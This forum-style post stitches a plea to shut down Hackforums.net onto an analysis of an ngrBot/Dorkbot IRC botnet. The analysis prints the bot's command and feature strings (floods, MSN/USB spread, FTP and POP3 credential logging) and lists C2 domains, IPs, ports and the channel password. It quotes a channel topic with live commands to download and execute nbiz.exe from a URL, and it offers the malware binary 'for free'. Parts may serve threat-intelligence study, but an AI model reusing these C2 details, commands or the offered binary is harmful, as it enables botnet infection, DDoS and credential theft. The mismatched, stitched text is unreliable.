Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)

This botnet is very big one and the bot used for spreading is also special
alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc

Sample vas captured by Xylitol and then i helped for finding more ip's and diferent samples from same botnet

The bot is detected as Dorkbot

Here we go


Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]

Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]

Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]


How to conect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81

UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here


Chanel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol

NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422


Chanel pass:ngrBot

The bin is for sell in underground forums for 400$ but u can have it for free now